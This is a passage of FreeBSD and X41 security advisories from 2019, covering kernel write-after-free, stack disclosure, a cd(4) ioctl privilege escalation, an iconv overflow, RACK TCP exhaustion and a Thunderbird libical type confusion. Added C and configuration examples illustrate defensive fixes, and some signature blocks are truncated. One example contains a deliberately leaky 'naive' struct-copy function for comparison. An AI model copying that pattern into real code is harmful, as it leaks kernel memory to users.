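demo_overflow_refused(void)
{
    char big[300];
    unsigned char buf[64 + 1];
    const char *const names[] = { "TERM" };
    const char *const values[] = { big };
    const int uservar[] = { 0 };

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    buf[64] = 0x5A;
    return env_encode_is(buf, 64, names, values, uservar, 1) == -1 && buf[64] == 0x5A;
}

int
main(void)
{
    long n = env_encode_is(demo_out, sizeof demo_out, demo_names, demo_values, demo_uservar, 1);
    printf("%ld bytes:", n);
    for (long i = 0; i < n; i++) printf(" %02x", demo_out[i]);
    printf("\noversized value refused: %d\n", demo_overflow_refused());
    return 0;
}
```

The two properties the encoder enforces are exactly the two that matter on this attack surface: output length is bounded by the caller's buffer regardless of how long the environment value is, and bytes that are special to the protocol (IAC, VAR, VALUE, ESC, USERVAR) cannot be injected unescaped by whoever controls the environment.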
FreeBSD Security Advisory FreeBSD-SA-19:13.pts
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:13.pts                                        Security Advisory
                                                          The FreeBSD Project

Topic:          pts(4) write-after-free

Category:       core
Module:         kernel
Announced:      2019-07-24
Credits:        syzkaller
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-07 14:19:46 UTC (stable/12, 12.0-STABLE)
                2019-07-24 12:53:06 UTC (releng/12.0, 12.0-RELEASE-p8)
                2019-07-07 14:20:14 UTC (stable/11, 11.2-STABLE)
                2019-07-24 12:53:06 UTC (releng/11.2, 11.2-RELEASE-p12)
                2019-07-24 12:53:06 UTC (releng/11.3, 11.3-RELEASE-p1)
CVE Name:       CVE-2019-5606

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The posix_openpt(2) system call allocates a pseudo-terminal device and
returns a descriptor referencing that device. Such a descriptor may be
configured such that a SIGIO signal will be sent to a designated process or
process group when the device is ready to perform I/O.

II.  Problem Description

The code which handles a close(2) of a descriptor created by posix_openpt(2)
fails to undo the configuration which causes SIGIO to be raised. This bug
can lead to a write-after-free of kernel memory.

III. Impact

The bug permits malicious code to trigger a write-after-free, which may be
used to gain root privileges or escape a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch
# fetch https://security.FreeBSD.org/patches/SA-19:13/pts.patch.asc
# gpg --verify pts.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r349805
releng/12.0/                                                      r350282
stable/11/                                                        r349806
releng/11.2/                                                      r350282
releng/11.3/                                                      r350282
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5606>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:13.pts.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl04Wl9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cLZDA//SGC+7Vghtofm/CzylIXhC1drFOxNYJOF7KEJqDwsRR3U9S99Q9NBWS5+
e+/vJzvV0+epZNQXDlit5a76jGwy4fNuutNh0J3APHe/l0Zp/PhM56IwRWQgqAkQ
hF67xhHxFZs8AH6/bw21N4IkRrAZHmrrCY8ubZArjoUi0gCoFzAYRw1Nh/JTQoLS
IGuqUFaMZWKvu3aeJiikLjHiJUMRAY7sxh+iSBSp99dsLkASqQZtx1grmosljttN
fuD7qO2f067EWUpC50JTbNt9V7za854hrlOp8jn1g51O4fWWJoEEL2/0VUeOO+fr
aGS9UNal25NPr2zGzx2t0u1VNE3/YKoZ0tq+mQYtaXke32ZO15Ufby0YcLU4DF8d
dU1ZoG2AGbWmBqgQ982hocq5Dn0r5yCHXDeEGguE1DsfyBuUEZw6zfYRtzIQ0swk
wDrdETxpIMa8jaSGtDw2bilrLNRIVqYkXBJftC3fpXhlz6PyU6bZaFm00xrs7z1D
EJMkuIWho9oMqLTU7bZNHv7JD4G3ziTF1h2tGXGcEKp02ImNZQnw3w5PBberFgto
H4uJQCWgFqqddkjnSidX3Uj676LC99ERDEUl
FreeBSD Security Advisory FreeBSD-SA-19:10.ufs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:10.ufs                                        Security Advisory
                                                          The FreeBSD Project

Topic:          Kernel stack disclosure in UFS/FFS

Category:       core
Module:         Kernel
Announced:      2019-07-02
Credits:        David G. Lawrence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-05-10 23:45:16 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:02:16 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-05-10 23:46:42 UTC (stable/11, 11.2-STABLE)
                2019-07-02 00:02:16 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5601

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Berkeley Fast File System (FFS) is an implementation of the UNIX File
System (UFS) filesystem used by FreeBSD.

II.  Problem Description

A bug causes up to three bytes of kernel stack memory to be written to disk
as uninitialized directory entry padding. This data can be viewed by any
user with read access to the directory. Additionally, a malicious user with
write access to a directory can cause up to 254 bytes of kernel stack memory
to be exposed.

III. Impact

Some amount of the kernel stack is disclosed and written out to the
filesystem.

IV.  Workaround

No workaround is available but systems not using UFS/FFS are not affected.

V.   Solution

Special note: This update also adds the -z flag to fsck_ffs to have it scrub
the leaked information in the name padding of existing directories. It only
needs to be run once on each UFS/FFS filesystem after a patched kernel is
installed and running.

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.12.patch.asc
# gpg --verify ufs.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:10/ufs.11.patch.asc
# gpg --verify ufs.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html>, reboot the
system and run:

# fsck -t ufs -f -p -T ufs:-z

to clean up your existing filesystems.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r347474
releng/12.0/                                                      r349623
stable/11/                                                        r347475
releng/11.2/                                                      r349623
- -------------------------------------------------------------------------

Note: This patch was applied to the stable/11 branch before the branch point
for releng/11.3. As such, no patch is needed for any 11.3-BETA or -RC.

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5601>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:10.ufs.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WVfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cJgRhAAic+yb4boY5k2TotBe9x
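SA-19:14 (freebsd32 ioctl replies) and SA-19:10 (UFS directory entries) share one root cause: a structure is filled field by field on memory that still holds earlier kernel stack contents, then copied out whole, so its padding and unused bytes carry whatever was there. The C program below is an added example, not the kernel's code; struct record, its three padding bytes and the 0xAA marker standing in for stale stack data are constructed for illustration. It emits the same record the naive way and the zeroed way and counts the marker bytes that escape, which is also a usable check when reviewing code that copies structures to userland or to disk.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Record that leaves the kernel: an ioctl reply copied to userland, or a
 * directory entry written to disk. The layout forces padding after `type`
 * (to align `ino`), and a short name leaves unused bytes in name[]. */
struct record {
    uint8_t  type;
    uint32_t ino;
    uint8_t  namelen;
    char     name[7];
};
#define RECORD_SIZE 16            /* expected sizeof on common ABIs; checked in the test */
#define STALE 0xAA                /* marker standing in for whatever the stack held before */

/* Naive: fill the fields on memory that still holds earlier contents and copy
 * the whole object out. Padding and the unused tail of name[] go out as-is. */
size_t
emit_record_naive(uint32_t ino, const char *name, unsigned char *out)
{
    union { struct record r; unsigned char raw[sizeof(struct record)]; } u;
    size_t len = strlen(name);

    if (len > sizeof u.r.name)
        len = sizeof u.r.name;
    memset(u.raw, STALE, sizeof u.raw);        /* simulate stale stack contents */
    u.r.type = 1;
    u.r.ino = ino;
    u.r.namelen = (uint8_t)len;
    memcpy(u.r.name, name, len);               /* leaves name[len..] untouched */
    memcpy(out, u.raw, sizeof u.raw);
    return sizeof u.raw;
}

/* Hardened: clear the whole object before filling it, so every byte that
 * leaves the kernel has a defined value. The field assignments are identical;
 * only the memset differs. */
size_t
emit_record_zeroed(uint32_t ino, const char *name, unsigned char *out)
{
    union { struct record r; unsigned char raw[sizeof(struct record)]; } u;
    size_t len = strlen(name);

    if (len > sizeof u.r.name)
        len = sizeof u.r.name;
    memset(u.raw, STALE, sizeof u.raw);        /* same stale memory ... */
    memset(u.raw, 0, sizeof u.raw);            /* ... cleared before use */
    u.r.type = 1;
    u.r.ino = ino;
    u.r.namelen = (uint8_t)len;
    memcpy(u.r.name, name, len);
    memcpy(out, u.raw, sizeof u.raw);
    return sizeof u.raw;
}

/* Audit check: how many emitted bytes still carry the stale marker. Callers
 * choose an ino and name whose legitimate bytes never equal STALE. */
size_t
stale_bytes(const unsigned char *out, size_t n)
{
    size_t k = 0;

    for (size_t i = 0; i < n; i++)
        k += (out[i] == STALE);
    return k;
}

unsigned char demo_record[RECORD_SIZE];   /* buffer for the usage below and the tests */

int
main(void)
{
    size_t n = emit_record_naive(0x01020304u, "ab", demo_record);
    printf("naive:  %zu stale byte(s) of %zu\n", stale_bytes(demo_record, n), n);
    n = emit_record_zeroed(0x01020304u, "ab", demo_record);
    printf("zeroed: %zu stale byte(s) of %zu\n", stale_bytes(demo_record, n), n);
    return 0;
}
```

With the name "ab" the naive path leaks eight bytes: the three alignment padding bytes after `type` plus the five unused bytes of name[]. That second group is what SA-19:10 means by a user with write access exposing far more than three bytes; the length of the name chooses how much of the record is left unwritten.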
FreeBSD Security Advisory FreeBSD-SA-19:11.cd_ioctl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:11.cd_ioctl                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Privilege escalation in cd(4) driver

Category:       core
Module:         kernel
Announced:      2019-07-02
Credits:        Alex Fortune
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:11:31 UTC (stable/12, 12.0-STABLE)
                2019-07-02 00:03:55 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:12:50 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-02 00:03:55 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-02 00:03:55 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5602

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The cd(4) driver implements a number of ioctls to permit low-level access to
the media in the CD-ROM device. The Linux emulation layer provides a
corresponding set of ioctls, some of which are implemented as wrappers of
native cd(4) ioctls. These ioctls are available to users in the operator
group, which gets read-only access to cd(4) devices by default.

II.  Problem Description

To implement one particular ioctl, the Linux emulation code used a special
interface present in the cd(4) driver which allows it to copy subchannel
information directly to a kernel address. This interface was erroneously
made accessible to userland, allowing users with read access to a cd(4)
device to arbitrarily overwrite kernel memory when some media is present in
the device.

III. Impact

A user in the operator group can make use of this interface to gain root
privileges on a system with a cd(4) device when some media is present in the
device.

IV.  Workaround

devfs.conf(5) and devfs.rules(5) can be used to remove read permissions from
cd(4) devices.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Afterwards, reboot the system.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.12.patch.asc
# gpg --verify cd_ioctl.12.patch.asc

[FreeBSD 11.x]
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch
# fetch https://security.FreeBSD.org/patches/SA-19:11/cd_ioctl.11.patch.asc
# gpg --verify cd_ioctl.11.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r349628
releng/12.0/                                                      r349625
stable/11/                                                        r349629
releng/11.3/                                                      r349625
releng/11.2/                                                      r349625
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5602>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:11.cd_ioctl.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WtfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1Qz
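The SA-19:11 workaround names devfs.conf(5) and devfs.rules(5) without showing a rule. Below is an added configuration example, not text from the advisory: the stock cd(4) node is readable by group operator, which is the access the advisory says is enough to reach the vulnerable ioctl, and the ruleset strips the group and world read bits. The ruleset name localrules and number 10 are arbitrary choices for this example.

```conf
# Stock cd(4) node as the advisory describes it: group operator can read.
#   crw-r-----  root  operator  /dev/cd0
#
# /etc/devfs.rules: drop group and world read from every cd(4) node. Because
# rules are applied by devfs as nodes appear, this also covers drives that
# show up after boot (USB optical drives).
[localrules=10]
add path 'cd*' mode 0600

# /etc/rc.conf: select the ruleset for the system devfs mount, then reload
# with:  service devfs restart
devfs_system_ruleset="localrules"

# Alternative via /etc/devfs.conf, which only affects nodes present at boot:
# perm cd0 0600
```

The rule also removes the operator group's ability to use cdcontrol(1) and similar tools on the drive; that is the point, since the advisory's attack surface is exactly that read access, and the rule should be dropped again once the patched kernel is installed.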
FreeBSD Security Advisory FreeBSD-SA-19:09.iconv
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:09.iconv                                      Security Advisory
                                                          The FreeBSD Project

Topic:          iconv buffer overflow

Category:       core
Module:         libc
Announced:      2019-07-02
Credits:        Andrea Venturoli, NetFence
Affects:        All supported versions of FreeBSD.
Corrected:      2019-07-03 00:01:38 UTC (stable/12, 12.0-STABLE)
                2019-07-03 00:00:39 UTC (releng/12.0, 12.0-RELEASE-p7)
                2019-07-03 00:03:14 UTC (stable/11, 11.3-PRERELEASE)
                2019-07-03 00:00:39 UTC (releng/11.3, 11.3-RC3-p1)
                2019-07-03 00:00:39 UTC (releng/11.2, 11.2-RELEASE-p11)
CVE Name:       CVE-2019-5600

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The iconv(3) API converts text data from one character encoding to another
and is available as part of the standard C library (libc).

II.  Problem Description

With certain inputs, iconv may write beyond the end of the output buffer.

III. Impact

Depending on the way in which iconv is used, an attacker may be able to
create a denial of service, provoke incorrect program behavior, or induce
a remote code execution. iconv is a libc library function and the nature
of possible attacks will depend on the way in which iconv is used by
applications or daemons.

IV.  Workaround

No workaround is available. Stack canaries (-fstack-protector), which are
enabled by default, provide a degree of defense against code injection but
not against denial of service.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.
Restart any potentially affected daemons.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch
# fetch https://security.FreeBSD.org/patches/SA-19:09/iconv.patch.asc
# gpg --verify iconv.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile the operating system using buildworld and installworld as
described in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.

Restart all daemons that use the library, or reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349622
releng/12.0/                                                      r349621
stable/11/                                                        r349624
releng/11.3/                                                      r349621
releng/11.2/                                                      r349621
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5600>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:09.iconv.asc>

-----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0b9WBfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cK8qg//bXSYMJQUBC0POTT5zGXSAmXfKjxbCi4N67cfTrQkEvW672QX4Jw9smkK D3PwyQs8QWIwsXL69rRgKDFHhPplOmTkx1vaPrA3DckYliwNvLRV3I6G2bRnx3E3 DoAyDmBvFK5lJWa3WxbCpeJA69yZ/JbX1Yw6HsRLk74hGkfvlkruKkfxsNjXzaq4 0+d+ZYs/vRDmIW5/R/bYy1+iyDamyCMl2xXtlZBKrGe6lhj8Vi4/evJjipFtskc2 RnGKolNoZQc03pgX0QS2JZDb+ay23elkOCbhYPqGr1f++M95oOktX3epsJNSH++u pmJ72FNRsnZSVFxoX7o14eh4k6OGYIvGFSkXQ9VG1NV7PQO8VZAQk9gw264O/1Mi 2aW88e78GLallQOg32VM+Ybys9MamBHByiYRz+GXhh91gg
FreeBSD Security Advisory FreeBSD-SA-19:08.rack
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:08.rack                                       Security Advisory
                                                          The FreeBSD Project

Topic:          Resource exhaustion in non-default RACK TCP stack

Category:       core
Module:         inet
Announced:      2019-06-19
Credits:        Jonathan Looney (Netflix)
                Peter Lei (Netflix)
Affects:        FreeBSD 12.0 and later
Corrected:      2019-06-19 16:25:39 UTC (stable/12, 12.0-STABLE)
                2019-06-19 16:43:05 UTC (releng/12.0, 12.0-RELEASE-p6)
CVE Name:       CVE-2019-5599

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>.

I.   Background

The Transmission Control Protocol (TCP) of the TCP/IP protocol suite
provides a connection-oriented, reliable, sequence-preserving data stream
service.

A TCP loss detection algorithm called RACK ("Recent ACKnowledgment") uses
the notion of time, in addition to packet or sequence counts, to detect
losses for modern TCP implementations that support per-packet timestamps
and the selective acknowledgment (SACK) option.

FreeBSD ships an optional implementation of RACK. Please note this is not
included by default. If RACK was not specifically compiled, installed, and
loaded, the system is not vulnerable.

II.  Problem Description

While processing acknowledgements, the RACK code uses several linked lists
to maintain state entries. A malicious attacker can cause the lists to grow
unbounded. This can cause an expensive list traversal on every packet being
processed, leading to resource exhaustion and a denial of service.

III. Impact

An attacker with the ability to send specially crafted TCP traffic to a
victim system can degrade network performance and/or consume excessive CPU
by exploiting the inefficiency of traversing the potentially very large
RACK linked lists with relatively small bandwidth cost.

IV.  Workaround

By default RACK is not compiled or loaded into the TCP stack.

To determine if you are using RACK, check the
net.inet.tcp.functions_available sysctl. If it includes a line with
"rack", the RACK stack is loaded.

To disable RACK, unload the kernel module with:

# kldunload tcp_rack

Note: it may be required to use the force flag (-f) with the kldunload.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Since the tcp_rack kernel module is not built by default, recompile,
reinstall, and reload the kernel module.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch
# fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc
# gpg --verify rack.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile, reinstall, and reload the tcp_rack kernel module.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r349197
releng/12.0/                                                      r349199
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<URL:https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<URL:https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md>
<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599>

The latest revision of this advisory is available at
<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc>

-----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0KZy1fFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbn
X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-004

Type confusion in Thunderbird
=============================

Severity Rating: Medium
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11706
CWE: 843
CVSS Score: 6.5
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird

Summary and Impact
==================

A type confusion has been identified in the Thunderbird email client. The
issue is present in the libical implementation, which was forked from
upstream libical version 0.47. The issue can be triggered remotely, when an
attacker sends a specially crafted calendar attachment, and does not require
user interaction. It might be used by a remote attacker to crash the process
or leak information from the client system via calendar replies.

X41 did not perform a full test or audit on the software.

Product Description
===================

Thunderbird is a free and open source email, newsfeed, chat, and calendaring
client that is easy to set up and customize.

Analysis
========

A type confusion in icalproperty.c icaltimezone_get_vtimezone_properties()
can be triggered while parsing a malformed calendar attachment. Missing
sanity checks allow a TZID property to be parsed as ICAL_FLOAT_VALUE while
it is later used as a string.

The bug manifests when strdup(tzid) is called with tzid holding a bad
pointer obtained by casting a float value to char*, which typically means a
segfault from dereferencing an unmapped memory page. An attacker might be
able to deliver an input file containing specially crafted float values as
TZID properties that point to arbitrary memory positions. Under certain
conditions this could allow information to be exfiltrated via a calendar
reply, or have other undetermined impact.

Proof of Concept
================

A reproducer eml file can be found in
https://github.com/x41sec/advisories/tree/master/X41-2019-004

Workarounds
===========

A fix is available from upstream. Alternatively, libical can be replaced by
icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in the Thunderbird configuration.

Timeline
========

2019-05-30 Issues reported to the vendor
2019-06-07 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having
extensive industry experience and expertise in the area of information
security, a strong core security team of world class security experts
enables X41 to perform premium security services.

Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery. Custom research and IT security consulting and support services
are core competencies of X41.

-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50 CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY 8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr 4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4 M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk= =Hy9J
-----END PGP SIGNATURE-----
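The defensive pattern behind this advisory is to check a value's kind before treating it as a string. The following is an added C example, not code from X41, libical or Thunderbird: a small tagged property value whose string accessor returns NULL unless the stored kind really is a string, so a float payload can never be reinterpreted as a char pointer. The names prop_value, prop_value_parse, prop_value_as_string and tzid_from_line, and the ";VALUE=FLOAT" marker used to flag a float-typed value, are constructed for this illustration.

```c
/* Added example, not code from X41, libical or Thunderbird.  All names here
 * (prop_value, prop_value_parse, prop_value_as_string, tzid_from_line) and
 * the ";VALUE=FLOAT" marker syntax are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

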